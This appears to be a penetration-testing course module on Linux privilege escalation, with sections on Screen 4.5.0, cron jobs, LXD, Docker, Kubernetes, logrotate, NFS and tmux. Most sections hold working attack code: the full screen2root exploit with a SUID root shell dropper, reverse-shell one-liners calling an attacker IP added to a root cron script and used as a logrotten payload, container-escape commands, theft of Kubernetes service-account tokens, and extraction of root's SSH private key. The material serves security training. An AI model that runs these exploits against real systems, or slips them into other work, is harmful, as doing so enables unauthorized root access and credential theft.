Service-based Privilege Escalation
Vulnerable Services
Many services can be found that have flaws which can be leveraged to escalate privileges. An example is the popular terminal multiplexer Screen. Version 4.5.0 suffers from a privilege escalation vulnerability due to a missing permissions check when opening a log file.
This allows an attacker to truncate any file or create a file owned by root in any directory, and ultimately gain full root access.
Privilege Escalation - Screen_Exploit.sh
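A sketch of the widely shared proof of concept (often called screen2root) is shown below. The file names /tmp/libhax.c and /tmp/rootshell.c come from the public PoC and are not specific to any particular target; adjust paths as needed.

```bash
# library whose constructor makes /tmp/rootshell SUID root and cleans up the preload file
cat << 'EOF' > /tmp/libhax.c
#include <sys/stat.h>
#include <unistd.h>
__attribute__((constructor))
static void dropshell(void) {
    chown("/tmp/rootshell", 0, 0);      /* give the shell to root */
    chmod("/tmp/rootshell", 04755);     /* set the SUID bit */
    unlink("/etc/ld.so.preload");       /* clean up */
}
EOF
gcc -fPIC -shared -o /tmp/libhax.so /tmp/libhax.c

# small SUID shell dropper
cat << 'EOF' > /tmp/rootshell.c
#include <unistd.h>
int main(void) {
    setuid(0);
    setgid(0);
    execl("/bin/sh", "sh", NULL);
    return 0;
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c

cd /etc
umask 000
# screen (SUID root) writes the "logfile" as root, appending our library path to /etc/ld.so.preload
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls        # any screen invocation now preloads libhax.so as root
/tmp/rootshell    # root shell
```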
Cron Job Abuse
Cron jobs can also be set to run one time (such as on boot). They are typically used for administrative tasks such as running backups, cleaning up directories, etc. The crontab command can create a cron file, which will be run by the cron daemon on the schedule specified. When created, the cron file is placed in /var/spool/cron for the specific user that creates it. Each entry in the crontab file requires six fields in the following order: minute, hour, day of the month, month, day of the week, and command. For example, the entry 0 */12 * * * /home/admin/backup.sh would run every 12 hours.
The root crontab is almost always only editable by the root user or a user with full sudo privileges; however, it can still be abused. You may find a world-writable script that runs as root and, even if you cannot read the crontab to know the exact schedule, you may be able to ascertain how often it runs (i.e., a backup script that creates a .tar.gz file every 12 hours). In this case, you can append a command onto the end of the script (such as a reverse shell one-liner), and it will execute the next time the cron job runs.
Certain applications create cron files in the /etc/cron.d directory and may be misconfigured to allow a non-root user to edit them.
First, let's look around the system for any writeable files or directories. The file backup.sh in the /dmz-backups directory is interesting and seems like it could be running on a cron job. (In the find command below, -o is an OR, and the - before the permission string o+w is just find syntax.)
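A search along these lines might look as follows; pruning /proc is a common choice to cut down on noise rather than a requirement:

```bash
# world-writable files, skipping the /proc pseudo-filesystem
find / -path /proc -prune -o -type f -perm -o+w -print 2>/dev/null

# world-writable directories
find / -path /proc -prune -o -type d -perm -o+w -print 2>/dev/null
```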
A quick look in the /dmz-backups directory shows what appears to be files created every three minutes. This seems to be a major misconfiguration. Perhaps the sysadmin meant to specify every three hours like 0 */3 * * * but instead wrote */3 * * * *, which tells the cron job to run every three minutes. The second issue is that the backup.sh shell script is world-writeable and runs as root.
We can confirm that a cron job is running using pspy, a command-line tool used to view running processes without the need for root privileges. We can use it to see commands run by other users, cron jobs, etc. It works by scanning procfs.
Let's run pspy and have a look. The -pf flag tells the tool to print commands and file system events, and -i 1000 tells it to scan procfs every 1000ms (or every second).
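Assuming the standard pspy64 release binary has already been uploaded to the target, the invocation described above would be:

```bash
./pspy64 -pf -i 1000
```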
From the above output, we can see that a cron job runs the backup.sh script located in the /dmz-backups directory and creates a tarball of the contents of the /var/www/html directory.
We can look at the shell script and append a command to it to attempt to obtain a reverse shell as root. If editing a script, ALWAYS take a copy of it and/or create a backup. We should also append our commands to the end of the script so that it still runs properly before executing our reverse shell command.
We modify the script, stand up a local netcat listener, and wait. Sure enough, within three minutes, we have a root shell!
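A minimal sketch of this, assuming our listener is reachable at 10.10.14.3:443 (both placeholder values):

```bash
# target: append a reverse shell to the world-writable script
echo 'bash -i >& /dev/tcp/10.10.14.3/443 0>&1' >> /dmz-backups/backup.sh

# attack box: catch the shell the next time the cron job fires
nc -lvnp 443
```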
Containers
Linux Containers
Linux Containers (LXC) is an operating-system-level virtualization technique that allows multiple Linux systems to run in isolation from each other on a single host by owning their own processes but sharing the host system kernel. LXC is very popular due to its ease of use and has become an essential part of IT security.
By default, LXC containers consume fewer resources than a virtual machine and have a standard interface, making it easy to manage multiple containers simultaneously. A platform with LXC can even be organized across multiple clouds, providing portability and ensuring that applications running correctly on the developer's system will work on any other system. In addition, large applications can be started, stopped, or have their environment variables changed via the Linux container interface.
Linux Daemon
Linux Daemon (LXD) is similar in some respects but is designed to contain a complete operating system. Thus it is not an application container but a system container. Before we can use this service to escalate our privileges, we must be in either the lxc or lxd group. We can find this out with the following command:
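For example, checking our group membership:

```bash
id
# look for lxc or lxd in the groups list
```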
From here on, there are several ways in which we can exploit LXC/LXD. We can either create our own container and transfer it to the target system or use an existing container. Unfortunately, administrators often use templates that have little to no security, which means the tools we need are often already present on the system.
Such templates often do not have passwords, especially if they are uncomplicated test environments that are meant to be quickly accessible and easy to use; a focus on security would complicate the whole setup and slow it down considerably. If we are a little lucky and there is such a container on the system, it can be exploited. For this, we need to import the container as an image.
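Assuming a template tarball is already present on the system (the file name and alias below are placeholders):

```bash
lxc image import ./alpine.tar.gz --alias alpine
lxc image list
```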
After verifying that this image has been successfully imported, we can initiate the image and configure it by specifying the security.privileged flag and the root path for the container. This flag disables all isolation features, allowing us to act on the host.
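Using the alias from the import above (the container name privesc is a placeholder):

```bash
lxc init alpine privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
```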
Once we have done that, we can start the container and log into it. In the container, we can then go to the path we specified to access the resources of the host system as root.
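Continuing with the placeholder names from above:

```bash
lxc start privesc
lxc exec privesc /bin/sh
# inside the container, the host filesystem is mounted read-write under /mnt/root
ls -l /mnt/root/root
```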
Docker
Docker is a popular open-source tool that provides a portable and consistent runtime environment for software applications. It uses containers as isolated environments in user space that run at the operating system level and share the file system and system resources.
Docker Architecture
At the core of the Docker architecture lies a client-server model, where we have two primary components:
The Docker daemon
The Docker client
The Docker client acts as our interface for issuing commands and interacting with the Docker ecosystem, while the Docker daemon is responsible for executing those commands and managing containers.
Docker Daemon
The Docker Daemon, also known as the Docker server, is a critical part of the Docker platform that plays a pivotal role in container management and orchestration. Think of the Docker Daemon as the powerhouse behind Docker. It has several essential responsibilities, like:
running Docker containers
interacting with Docker containers
managing Docker containers on the host system.
Managing Docker Containers
Firstly, it handles the core containerization functionality. It coordinates the creation, execution, and monitoring of Docker containers, maintaining their isolation from the host and other containers. This isolation ensures that containers operate independently, with their own file systems, processes, and network interfaces. Furthermore, it handles Docker image management. It pulls images from registries, such as Docker Hub or private repositories, and stores them locally. These images serve as the building blocks for creating containers.
Additionally, the Docker Daemon offers monitoring and logging capabilities, for example:
Captures container logs
Provides insight into container activities, errors, and debugging information.
The Daemon also monitors resource utilization, such as CPU, memory, and network usage, allowing us to optimize container performance and troubleshoot issues.
Network and Storage
It facilitates container networking by creating virtual networks and managing network interfaces. It enables containers to communicate with each other and the outside world through network ports, IP addresses, and DNS resolution. The Docker Daemon also plays a critical role in storage management: it handles Docker volumes, which are used to persist data beyond the lifespan of containers, and manages volume creation, attachment, and clean-up, allowing containers to share or store data independently of each other.
Docker Clients
When we interact with Docker, we issue commands through the Docker Client, which communicates with the Docker Daemon (through a RESTful API or a Unix socket) and serves as our primary means of interacting with Docker. We also have the ability to create, start, stop, manage, and remove containers, as well as search for and download Docker images. With these options, we can pull existing images to use as a base for our containers or build our custom images using Dockerfiles. We have the flexibility to push our images to remote repositories, facilitating collaboration and sharing within our teams or with the wider community.
The Daemon, on the other hand, carries out the requested actions, ensuring containers are created, launched, stopped, and removed as required.
Another client for Docker is Docker Compose. It is a tool that simplifies the orchestration of multiple Docker containers as a single application. It allows us to define our application's multi-container architecture using a declarative YAML (.yaml/.yml) file. With it, we can specify the services comprising our application, their dependencies, and their configurations. We define container images, environment variables, networking, volume bindings, and other settings. Docker Compose then ensures that all the defined containers are launched and interconnected, creating a cohesive and scalable application stack.
Docker Desktop
Docker Desktop is available for MacOS, Windows, and Linux operating systems and provides us with a user-friendly GUI that simplifies the management of containers and their components. This allows us to monitor the status of our containers, inspect logs, and manage the resources allocated to Docker. It provides an intuitive and visual way to interact with the Docker ecosystem, making it accessible to developers of all levels of expertise. Additionally, it supports Kubernetes.
Docker Images and Containers
Think of a Docker image as a blueprint or a template for creating containers. It encapsulates everything needed to run an application, including the application's code, dependencies, libraries, and configurations. An image is a self-contained, read-only package that ensures consistency and reproducibility across different environments. We can create images using a text file called a Dockerfile, which defines the steps and instructions for building the image.
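A minimal Dockerfile might look like this; the base image, package, and file names are purely illustrative:

```dockerfile
FROM ubuntu:22.04                                   # base image to build on
RUN apt-get update && apt-get install -y python3    # install dependencies
COPY app.py /opt/app.py                             # add the application code
CMD ["python3", "/opt/app.py"]                      # default command when a container starts
```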
A Docker container is an instance of a Docker image. It is a lightweight, isolated, and executable environment that runs applications. When we launch a container, it is created from a specific image, and the container inherits all the properties and configurations defined in that image. Each container operates independently, with its own filesystem, processes, and network interfaces. This isolation ensures that applications within containers remain separate from the underlying host system and other containers, preventing conflicts and interference.
While images are immutable and read-only, containers are mutable and can be modified during runtime. We can interact with containers, execute commands within them, monitor their logs, and even make changes to their filesystem or environment. However, any modifications made to a container's filesystem are not persisted unless explicitly saved as a new image or stored in a persistent volume.
Docker Privilege Escalation
We may get access to an environment where we find users who can manage Docker containers. With this, we could look for ways to use those Docker containers to obtain higher privileges on the target system. Several techniques can be used to escalate our privileges or escape the Docker container.
Docker Shared Directories
When using Docker, shared directories (volume mounts) can bridge the gap between the host system and the container's filesystem. With shared directories, specific directories or files on the host system can be made accessible within the container. This is incredibly useful for persisting data, sharing code, and facilitating collaboration between development environments and Docker containers. However, it always depends on the setup of the environment and the goals that administrators want to achieve. To create a shared directory, a path on the host system and a corresponding path within the container is specified, creating a direct link between the two locations.
When we get access to the Docker container and enumerate it locally, we might find additional (non-standard) directories on the container's filesystem.
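From inside the container, one way to spot such mounts is to inspect the mount table; the filtering below is illustrative and the output depends entirely on the environment:

```bash
# inside the container: list mounts that are not part of the standard container plumbing
mount | grep -vE 'overlay|proc|sysfs|tmpfs|cgroup|mqueue|devpts'
cat /proc/self/mountinfo
```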
Docker Sockets
A Docker socket or Docker daemon socket is a special file that allows us and processes to communicate with the Docker daemon. This communication occurs either through a Unix socket or a network socket, depending on the configuration of our Docker setup. It acts as a bridge, facilitating communication between the Docker client and the Docker daemon. When we issue a command through the Docker CLI, the Docker client sends the command to the Docker socket, and the Docker daemon, in turn, processes the command and carries out the requested actions.
Nevertheless, Docker sockets require appropriate permissions to ensure secure communication and prevent unauthorized access. Access to the Docker socket is typically restricted to specific users or user groups, ensuring that only trusted individuals can issue commands and interact with the Docker daemon.
By exposing the Docker socket over a network interface, we can remotely manage Docker hosts, issue commands, and control containers and other resources. This remote API access expands the possibilities for distributed Docker setups and remote management scenarios. However, depending on the configuration, automated processes or tasks may leave files behind that contain very useful information we can use to escape the Docker container.
From here on, we can use the docker binary to interact with the socket and enumerate which Docker containers are already running. If it is not installed in the container, we can download a statically linked docker binary and upload it to the Docker container.
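For example, pointing the client at the exposed socket (the binary location and socket path shown are the usual defaults and may differ):

```bash
/tmp/docker -H unix:///var/run/docker.sock ps
```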
We can create our own Docker container that maps the host's root directory (/) to the /hostsystem directory on the container. With this, we will get full access to the host system. Therefore, we must map these directories accordingly and use the main_app Docker image.
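A sketch of this, reusing the main_app image mentioned above:

```bash
/tmp/docker -H unix:///var/run/docker.sock run --rm -d -v /:/hostsystem main_app
/tmp/docker -H unix:///var/run/docker.sock ps    # note the ID of the new container
```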
Now, we can log in to the new privileged Docker container with the ID 7ae3bcc818af and navigate to the /hostsystem directory.
From there, we can again try to grab the private SSH key and log in as root or as any other user on the system with a private SSH key in its folder.
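Using the container ID from the example above:

```bash
/tmp/docker -H unix:///var/run/docker.sock exec -it 7ae3bcc818af /bin/bash
cat /hostsystem/root/.ssh/id_rsa    # host root's private key, if one exists
```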
Docker Group
To gain root privileges through Docker, the user we are logged in with must be in the docker group. This allows them to use and control the Docker daemon.
Alternatively, Docker may have the SUID bit set, or we may be in the sudoers file with permission to run docker as root. All three options allow us to work with Docker to escalate our privileges.
Most Docker hosts have a direct internet connection because the base images and containers must be downloaded. However, many hosts may be disconnected from the internet at night and outside working hours for security reasons. Even then, if these hosts are located in a network that other systems (for example, a web server) have to pass through, they can still be reached.
To see which images exist and which we can access, we can use the following command:
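For example:

```bash
docker image ls

# as a member of the docker group, any available image can then be used to mount the
# host filesystem into a new container (the image name here is illustrative)
docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
```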
Docker Socket
A case that can also occur is when the Docker socket is writable. Usually, this socket is located at /var/run/docker.sock, although the location can differ. By default, it is writable only by root and the docker group. If we are acting as a user who is not in either of these groups but the Docker socket is still writable, we can use it to escalate our privileges.
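A quick check of the socket permissions:

```bash
ls -la /var/run/docker.sock
```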
Kubernetes
Kubernetes, also known as K8s, stands out as a revolutionary technology that has had a significant impact on the software development landscape. This platform has completely transformed the process of deploying and managing applications, providing a more efficient and streamlined approach. Offering an open-source architecture, Kubernetes has been specifically designed to facilitate faster and more straightforward deployment, scaling, and management of application containers.
K8s Concept
Kubernetes revolves around the concept of pods, which can hold one or more closely connected containers. Each pod functions as a separate virtual machine on a node, complete with its own IP, hostname, and other details. Kubernetes simplifies the management of multiple containers by offering tools for load balancing, service discovery, storage orchestration, self-healing, and more. Despite challenges in security and management, K8s continues to grow and improve with features like Role-Based Access Control (RBAC), Network Policies, and Security Contexts, providing a safer environment for applications.
Differences between K8s and Docker

| Function | Docker | Kubernetes |
| --- | --- | --- |
| Primary | Platform for containerizing apps | An orchestration tool for managing containers |
| Scaling | Manual scaling with Docker Swarm | Automatic scaling |
| Networking | Single network | Complex network with policies |
| Storage | Volumes | Wide range of storage options |
Kubernetes architecture is primarily divided into two types of components:
The Control Plane (master node), which is responsible for controlling the Kubernetes cluster
The Worker Nodes (minions), where the containerized applications are run
Nodes
The master node hosts the Kubernetes Control Plane, which manages and coordinates all activities within the cluster and ensures that the cluster's desired state is maintained. The Minions, on the other hand, execute the actual applications; they receive instructions from the Control Plane and ensure the desired state is achieved.
Kubernetes is versatile enough to accommodate various needs, such as supporting databases, AI/ML workloads, and cloud-native microservices. It is also capable of managing high-resource applications at the edge and is compatible with different platforms, so it can be utilized on public cloud services like Google Cloud, Azure, and AWS or within private on-premises data centers.
Control Plane
The Control Plane serves as the management layer. It consists of several crucial components, including:
| Service | TCP Ports |
| --- | --- |
| etcd | 2379, 2380 |
| API server | 6443 |
| Scheduler | 10251 |
| Controller Manager | 10252 |
| Kubelet API | 10250 |
| Read-Only Kubelet API | 10255 |
These elements enable the Control Plane to make decisions and provide a comprehensive view of the entire cluster.
Minions
Within a containerized environment, the Minions (worker nodes) serve as the designated location for running applications. It's important to note that each node is managed and regulated by the Control Plane, which helps ensure that all processes running within the containers operate smoothly and efficiently.
The Scheduler, based on the API server, understands the state of the cluster and schedules new pods on the nodes accordingly. After deciding which node a pod should run on, the API server updates etcd.
Understanding how these components interact is essential for grasping the functioning of Kubernetes. The API server is the entry point for all the administrative commands, either from users via kubectl or from the controllers. This server communicates with etcd to fetch or update the cluster state.
K8's Security Measures
Kubernetes security can be divided into several domains:
Cluster infrastructure security
Cluster configuration security
Application security
Data security
Each domain includes multiple layers and elements that must be secured and managed appropriately by the developers and administrators.
Kubernetes API
The core of Kubernetes architecture is its API, which serves as the main point of contact for all internal and external interactions. The Kubernetes API has been designed to support declarative control, allowing users to define their desired state for the system. This enables Kubernetes to take the necessary steps to implement the desired state. The kube-apiserver is responsible for hosting the API, which handles and verifies RESTful requests for modifying the system's state. These requests can involve creating, modifying, deleting, and retrieving information related to various resources within the system. Overall, the Kubernetes API plays a crucial role in facilitating seamless communication and control within the Kubernetes cluster.
Within the Kubernetes framework, an API resource serves as an endpoint that houses a specific collection of API objects. These objects pertain to a particular category and include essential elements such as Pods, Services, and Deployments, among others. Each unique resource comes equipped with a distinct set of operations that can be executed, including but not limited to:
| Request | Description |
| --- | --- |
| GET | Retrieves information about a resource or a list of resources. |
| POST | Creates a new resource. |
| PUT | Updates an existing resource. |
| PATCH | Applies partial updates to a resource. |
| DELETE | Removes a resource. |
Authentication
In terms of authentication, Kubernetes supports various methods such as client certificates, bearer tokens, an authenticating proxy, or HTTP basic auth, which serve to verify the user's identity. Once the user has been authenticated, Kubernetes enforces authorization decisions using Role-Based Access Control (RBAC). This technique involves assigning specific roles to users or processes with corresponding permissions to access and operate on resources. Therefore, Kubernetes' authentication and authorization process is a comprehensive security measure that ensures only authorized users can access resources and perform operations.
In Kubernetes, the Kubelet can be configured to permit anonymous access. By default, the Kubelet allows anonymous access. Anonymous requests are considered unauthenticated, which implies that any request made to the Kubelet without a valid client certificate will be treated as anonymous. This can be problematic, as any process or user that can reach the Kubelet API can make requests and receive responses, potentially exposing sensitive information or leading to unauthorized actions.
K8's API Server Interaction
System:anonymous typically represents an unauthenticated user, meaning we haven't provided valid credentials or are trying to access the API server anonymously. In this case, we try to access the root path, which would grant significant control over the Kubernetes cluster if successful. By default, access to the root path is generally restricted to authenticated and authorized users with administrative privileges, and the API server denies the request, responding with a 403 Forbidden status code accordingly.
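Such an anonymous request could look like the following; the API server address is a placeholder:

```bash
curl -k https://<control-plane-ip>:6443/
# expected for system:anonymous: a 403 Forbidden response from the API server
```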
Kubelet API - Extracting Pods
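With anonymous Kubelet access enabled, the pod list can typically be pulled straight from the Kubelet API on port 10250 (the node address is a placeholder):

```bash
curl -k https://<node-ip>:10250/pods
```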
The information displayed in the output includes the names, namespaces, creation timestamps, and container images of the pods. It also shows the last applied configuration for each pod, which could contain confidential details regarding the container images and their pull policies.
Understanding the container images and their versions used in the cluster can enable us to identify known vulnerabilities and exploit them to gain unauthorized access to the system. Namespace information can provide insights into how the pods and resources are arranged within the cluster, which we can use to target specific namespaces with known vulnerabilities. We can also use metadata such as uid and resourceVersion to perform reconnaissance and recognize potential targets for further attacks. Disclosing the last applied configuration can potentially expose sensitive information, such as passwords, secrets, or API tokens, used during the deployment of the pods.
We can further analyze the pods with the following command:
Kubeletctl - Extracting Pods
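Using kubeletctl, the equivalent enumeration might look like this (flags can vary between versions):

```bash
kubeletctl pods --server <node-ip>
```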
To effectively interact with pods within the Kubernetes environment, it's important to have a clear understanding of the available commands. One approach that can be particularly useful is utilizing the scan rce command in kubeletctl. This command provides valuable insights and allows for efficient management of pods.
Kubelet API - Available Commands
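For example, scanning all pods on the node for containers in which commands can be executed:

```bash
kubeletctl scan rce --server <node-ip>
```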
It is also possible for us to engage with a container interactively and gain insight into the extent of our privileges within it. This allows us to better understand our level of access and control over the container's contents.
Kubelet API - Executing Commands
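Running a command inside one of the reported containers; the pod and container names are placeholders taken from the scan output:

```bash
kubeletctl exec "id" --server <node-ip> -p <pod> -c <container>
```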
The output of the command shows that the current user executing the id command inside the container has root privileges. This indicates that we have gained administrative access within the container, which could potentially lead to privilege escalation vulnerabilities. If we gain access to a container with root privileges, we can perform further actions on the host system or other containers.
Privilege Escalation
To gain higher privileges and access the host system, we can utilize a tool called kubeletctl to obtain the Kubernetes service account's token and certificate (ca.crt) from the server. To do this, we must provide the server's IP address, namespace, and target pod. If we get this token and certificate, we can elevate our privileges even further, move horizontally throughout the cluster, or gain access to additional pods and resources.
Kubelet API - Extracting Tokens
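The service account token is mounted inside the pod by default, so it can be read with an exec through the Kubelet; the pod and container names are placeholders:

```bash
kubeletctl exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" \
    --server <node-ip> -p <pod> -c <container>
```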
Kubelet API - Extracting Certificates
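The CA certificate sits in the same directory:

```bash
kubeletctl exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" \
    --server <node-ip> -p <pod> -c <container>
```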
Now that we have both the token and certificate, we can check our access rights in the Kubernetes cluster. This is commonly used for auditing and verification to guarantee that users have the correct level of access and are not given more privileges than they need. However, we can use it for our own purposes and ask K8s whether we have permission to perform different actions on various resources.
List Privileges
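A sketch of such a check with kubectl, assuming the extracted token and ca.crt have been saved locally and the API server address is a placeholder:

```bash
kubectl auth can-i --list \
    --token=<token> \
    --certificate-authority=ca.crt \
    --server=https://<control-plane-ip>:6443
```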
Here we can see some very important information. Besides the selfsubject-resources, we can get, create, and list pods, which are the resources representing the running containers in the cluster. From here on, we can create a YAML file that we can use to create a new container and mount the entire root filesystem from the host system into this container's /root directory. From there, we can access the host system's files and directories. The YAML file could look like the following:
Pod YAML
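A sketch of such a pod definition; the pod name, namespace, and image are placeholders and should be adjusted to an image that already exists in the cluster:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: privesc
  namespace: default
spec:
  containers:
  - name: privesc
    image: nginx:1.14.2
    volumeMounts:
    - mountPath: /root            # host filesystem appears here inside the container
      name: mount-root-into-mnt
  volumes:
  - name: mount-root-into-mnt
    hostPath:
      path: /                     # mount the host's root filesystem
  automountServiceAccountToken: true
  hostNetwork: true
```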
Once the file is created, we can apply it to create the new pod and check if it is running as expected.
Creating a new Pod
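Reusing the credentials from above (the file name privesc.yaml is a placeholder):

```bash
kubectl apply -f privesc.yaml --token=<token> --certificate-authority=ca.crt --server=https://<control-plane-ip>:6443
kubectl get pods --token=<token> --certificate-authority=ca.crt --server=https://<control-plane-ip>:6443
```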
If the pod is running, we can execute commands in it and could spawn a reverse shell or retrieve sensitive data such as the root user's private SSH key.
Extracting Root's SSH Key
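Since the host's / is mounted at /root inside the pod, the host's /root directory ends up at /root/root; a sketch using the placeholder names from the YAML above:

```bash
kubeletctl exec "cat /root/root/.ssh/id_rsa" --server <node-ip> -p privesc -c privesc
```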
Logrotate
Every Linux system produces large amounts of log files. To prevent the hard disk from overflowing, a tool called logrotate takes care of archiving or disposing of old logs. If no attention is paid to log files, they become larger and larger and eventually occupy all available disk space. Furthermore, searching through many large log files is time-consuming. To prevent this and save disk space, logrotate was developed. The logs in /var/log give administrators the information they need to determine the cause behind malfunctions. Almost more important are the unnoticed system details, such as whether all services are running correctly.
Logrotate has many features for managing these log files. These include the specification of:
the size of the log file,
its age,
and the action to be taken when one of these factors is reached.
This tool is usually started periodically via cron and controlled via the configuration file /etc/logrotate.conf. This file contains global settings that determine the function of logrotate.
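Global directives in /etc/logrotate.conf typically look something like this (the exact values are illustrative):

```bash
# /etc/logrotate.conf (excerpt)
weekly                      # rotate log files weekly
su root adm                 # rotate as root:adm
rotate 4                    # keep 4 weeks' worth of backlogs
create                      # create a new (empty) log file after rotating the old one
include /etc/logrotate.d    # per-package configuration lives here
```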
To force a new rotation on the same day, we can set the date after the individual log files in the status file /var/lib/logrotate.status or use the -f/--force option:
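For example:

```bash
sudo logrotate -f /etc/logrotate.conf
```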
We can find the corresponding configuration files in the /etc/logrotate.d/ directory.
To exploit logrotate, some requirements have to be fulfilled:
we need write permissions on the log files
logrotate must run as a privileged user or root
vulnerable versions: 3.8.6, 3.11.0, 3.15.0, 3.18.0
There is a prefabricated exploit that we can use for this if the requirements are met. This exploit is named logrotten. We can download and compile it on a system with a kernel similar to the target's and then transfer it to the target system. Alternatively, if we can compile code on the target system, we can build it there directly.
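For example (the repository referenced here is the public logrotten PoC):

```bash
git clone https://github.com/whotwagner/logrotten.git
cd logrotten
gcc logrotten.c -o logrotten
```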
Next, we need a payload to be executed. Many different options are available to us here. In this example, we will run a simple bash-based reverse shell with the IP and port of the VM that we use to attack the target system.
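For instance (IP and port are placeholders):

```bash
echo 'bash -i >& /dev/tcp/<attacker-ip>/9001 0>&1' > payload
```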
However, before running the exploit, we need to determine which option logrotate uses in logrotate.conf.
In our case, it is the option create. Therefore, we have to use the exploit adapted to this function.
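A quick way to check:

```bash
grep -E "create|compress" /etc/logrotate.conf
```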
After that, we have to start a listener on our VM / Attacker machine, which waits for the target system's connection.
As a final step, we run the exploit with the prepared payload and wait for a reverse shell as a privileged user or root.
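A sketch of these final steps, assuming a writable log file at /tmp/tmp.log and the payload file created above:

```bash
# attack box
nc -lvnp 9001

# target: trigger logrotten against the writable log file
./logrotten -p ./payload /tmp/tmp.log
```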
Miscellaneous Techniques
Passive Traffic Capture
If tcpdump is installed, unprivileged users may be able to capture network traffic, including, in some cases, credentials passed in cleartext. Several tools exist, such as net-creds and PCredz, that can be used to examine data being passed on the wire. This may result in capturing sensitive information such as credit card numbers and SNMP community strings. It may also be possible to capture Net-NTLMv2, SMBv2, or Kerberos hashes, which could be subjected to an offline brute-force attack to reveal the plaintext password. Cleartext protocols such as HTTP, FTP, POP, IMAP, telnet, or SMTP may contain credentials that could be reused to escalate privileges on the host.
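A minimal capture for later offline analysis might look like this (interface and file name are placeholders):

```bash
tcpdump -i eth0 -nn -s0 -w /tmp/capture.pcap
# then feed the capture to net-creds / PCredz on the attack box
```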
Weak NFS Privileges
Network File System (NFS) allows users to access shared files or directories hosted on Unix/Linux systems over the network. NFS uses TCP/UDP port 2049. Any accessible mounts can be listed remotely by issuing the command showmount -e, which lists the NFS server's export list (or the access control list for filesystems) that is made available to NFS clients.
When an NFS volume is created, various options can be set:
root_squash
If the root user is used to access NFS shares, it will be changed to the nfsnobody user, which is an unprivileged account. Any files created and uploaded by the root user will be owned by the nfsnobody user, which prevents an attacker from uploading binaries with the SUID bit set.
no_root_squash
Remote users connecting to the share as the local root user will be able to create files on the NFS server as the root user. This would allow for the creation of malicious scripts/programs with the SUID bit set.
For example, we can create a SETUID binary that executes /bin/sh using our local root user. We can then mount the /tmp directory locally, copy the root-owned binary over to the NFS server, and set the SUID bit.
First, create a simple binary, mount the directory locally, copy it, and set the necessary permissions.
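A sketch of these steps, run as root on our attack box against a share exported with no_root_squash (the target IP and export path are placeholders):

```bash
cat << 'EOF' > shell.c
#include <stdlib.h>
#include <unistd.h>
int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/sh");
    return 0;
}
EOF
gcc shell.c -o shell

mount -t nfs <target-ip>:/tmp /mnt    # mount the exported /tmp locally
cp shell /mnt                         # the copy is owned by root on the server
chmod u+s /mnt/shell                  # set the SUID bit
# a low-privileged user on the target can now run /tmp/shell to get a root shell
```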
Hijacking Tmux Sessions
Terminal multiplexers such as tmux can be used to allow multiple terminal sessions to be accessed within a single console session. When not working in a tmux window, we can detach from the session, leaving it active (i.e., running an nmap scan). For many reasons, a user may leave a tmux process running as a privileged user such as root, set up with weak permissions, and it can be hijacked. This may be done with the following commands to create a new shared session and modify its ownership.
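For example, a root user might have set up a shared session like this; the socket path is illustrative, and devs is the group referenced below:

```bash
tmux -S /shareds new -s debugsess
chown root:devs /shareds
```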
If we can compromise a user in the devs group, we can attach to this session and gain root access.
We check for any running tmux processes, confirm the permissions on the socket, review our group membership, and finally attach to the tmux session and confirm root privileges.
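Taken together, the steps might look like this (the socket path /shareds is the illustrative one from above):

```bash
ps aux | grep tmux    # look for a tmux process running as root with a custom socket
ls -la /shareds       # confirm the socket is readable/writable by our group
id                    # verify membership in the devs group
tmux -S /shareds      # attach to the shared session
id                    # we should now be root
```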